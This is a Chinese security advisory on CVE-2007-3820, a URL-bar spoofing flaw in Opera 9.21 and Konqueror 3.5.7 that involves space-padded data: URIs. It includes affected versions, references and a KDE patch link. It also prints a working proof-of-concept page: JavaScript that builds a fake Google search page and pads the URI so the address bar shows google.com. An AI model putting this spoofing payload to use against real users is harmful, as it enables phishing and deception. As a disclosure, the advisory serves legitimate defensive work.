安全研究

安全漏洞
Opera及Konqueror浏览器data: URI主题地址栏欺骗漏洞

发布日期:2007-07-11
更新日期:2007-07-18

受影响系统:
Opera Software Opera 9.21
KDE Konqueror 3.5.7
描述:
BUGTRAQ  ID: 24912
CVE(CAN) ID: CVE-2007-3820

Opera和Konqueror都是流行的WEB浏览器。

Opera和Konqueror在处理URL栏的显示时存在漏洞,远程攻击者可能利用此漏洞进行地址欺骗,方便攻击者执行网络钓鱼攻击。

Opera及Konqueror浏览器在基于data: URL主题(RFC 2397)渲染页面时没有正确地显示URL栏的内容,仅显示了URL的末尾。如果攻击者用一定数量的空格(具体取决于document.body.clientWidth/Height属性)填充了URL就可以向浏览器的URL栏中注入欺骗内容,发动网络钓鱼类的攻击。

<*来源:Robert Swiecki (robert@swiecki.net
  
  链接:http://secunia.com/advisories/26074/
        http://secunia.com/advisories/26091/
        http://marc.info/?l=bugtraq&m=118443238505408&w=2
        http://www.kde.org/info/security/advisory-20070816-1.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<HTML>
<HEAD>
    <TITLE>Gaogle</TITLE>
</HEAD>
<BODY>

<SCRIPT LANGUAGE="JavaScript">

    var w = 1024.0;
    if (window.outerWidth) {
        w = window.outerWidth ;
    }
    w -= 579.0;

    var paddinglen = w / 2.95;
    var pad = "";
    for (x = 0; x < paddinglen; x++) {
        pad += " ";
    }

    window.location = "data:text/html;,<HTML><HEAD><TITLE>Gaogle</TITLE><BODY><CENTER><FONT COLOR=BLUE>G</FONT>&nbsp;<FONT COLOR=RED>U</FONT>&nbsp;<FONT COLOR=YELLOW>G</FONT>&nbsp;<FONT COLOR=BLUE>I</FONT>&nbsp;<FONT COLOR=GREEN>E</FONT>&nbsp;<FONT COLOR=RED>L</FONT>&nbsp;<BR></BODY><FORM ACTION=http://www.google.com/search><INPUT TYPE=text NAME=q><BR><INPUT TYPE=submit VALUE=Search></FORM><BR/><FONT COLOR=BLUE>If you see junk in the Opera url bar, try to manually enter (copy'n'paste) the address: <FONT COLOR=BLACK>http://alt.swiecki.net/oper1.html<BR><BR><FONT COLOR=BLACK>I was submitted several reports stating that not every Opera installation is prone to the vulnerability (I also have a few positive confirmations). The reference pictures can be found <A HREF='http://alt.swiecki.net/operawin.png'>here (Opera)</A> and <A HREF='http://alt.swiecki.net/konq.png'>here (Konqueror)</A><BR/><FONT COLOR=WHITE>                                                                                                                                                                                                                   http://www.google.com" + pad + ".";

</SCRIPT>

</BODY>
</HTML>

建议:
厂商补丁:

KDE
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://websvn.kde.org/branches/KDE/3.5/kdebase/konqueror/konq_combo.cc?r1=588187&r2=687933

浏览次数:2733
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障